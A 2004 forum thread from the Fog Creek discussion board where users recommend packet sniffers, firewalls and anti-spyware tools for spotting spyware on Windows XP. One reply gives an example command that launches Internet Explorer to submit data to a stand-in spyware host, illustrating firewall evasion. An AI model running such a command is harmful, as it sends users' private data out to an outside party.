Fog Creek Software
Discussion Board




Packet Sniffing Software

MarkTaw.com suggested in an earlier thread to use oacket sniffing software to spot for spy ware.

Would anyone have a pointer for one to use on a WinXP machine?

I am pretty ignorant on the packet and TCP/IP side of things - I would like to learn more. Would a packet sniffing software allow the user to monitor packets being sent?

Ram Dass
Sunday, January 18, 2004

If you want to stop spyware, my suggestion would be not to use a packet sniffer (which is complicated, and not as useful as it might sound at first unless you're really well versed in network protocols), but rather use a firewall that protects outbound as well as inbound. ZoneAlarm is one example of such a firewall.

Brad Wilson (dotnetguy.techieswithcats.com)
Sunday, January 18, 2004

Ethereal has a Windows port that is easy to install.

SG
Sunday, January 18, 2004

Yup, just install a firewall, and set it up so that a dialog pops up every time an application wants to connect out. FWIW, I use Kerio Personal Firewall, free for personal use.

FredF
Sunday, January 18, 2004

tcpdump works on windows.

Tom Vu
Sunday, January 18, 2004

The other suggestions work pretty well, but here's an easy, free GUI tool:

http://www.networkactiv.com/PIAFCTM.html

I used it recently and was pretty happy with it, although it's not for the 133+ crowd.

Lee
Sunday, January 18, 2004

Ethereal. It's free and it works great. I use it all the time, I used it earlier today.

http://www.ethereal.com/

www.MarkTAW.com
Sunday, January 18, 2004

Local firewalls are operationally challenged.  Sure, they intercept outgoing connections and compare to a white/prompt/black list etc.

However, this is trivial for spyware and malware to overcome.  They can subvert a surely trusted app, i.e. IE, and make it go submit your dirty secrets on their behalf.

"C:\Program Files\Internet Explorer\IExplore" "http://www.spware.central.com/uploadsecrets?uid=blah&open=blah&blah.."

i like i
Monday, January 19, 2004

I would recommend ethereal, programs like Norton Internet Security and Zone Lab's ZoneAlarm as well the following URL:

http://www.ece.vt.edu/network/network-tools.zip

Desc: A quick investigative toolkit compiled by the Electrical & Computer Engineering, Departmental Network Information

Most executables come from www.sysinternals.com, handle.exe in particular, is of interest to most users because it shows you which program is running and what files or pipes the programs are holding on to.

A word of caution, I have this nagging feeling that most modern trojans depend on "rootkit" libraries capable of pretty much completely hiding themselves from sight on NT5.0+ servers, and they are updated so often that they won't show up on an antivirus detection anytime soon.

Li-fan Chen
Monday, January 19, 2004

another vote for ethereal, its easy to use and _very_ easy to install (as long as you follow the instructions :)

FullNameRequired
Monday, January 19, 2004

There's also an ActiveX Packet Sniffer around, callled PacketX.

Indian Developer in India
Monday, January 19, 2004

Another plug for Ethereal (anyone else notice, though, that the recent version seems a bit buggier with the new UI)?

I must point out (if you havent seen it already) the program Ad-aware at http://www.lavasoftusa.com/ .  It scans the registry, memory, and disk for spyware signatures.  Quite good at what it does.

-Rich

Rich
Tuesday, January 20, 2004

*  Recent Topics

*  Fog Creek Home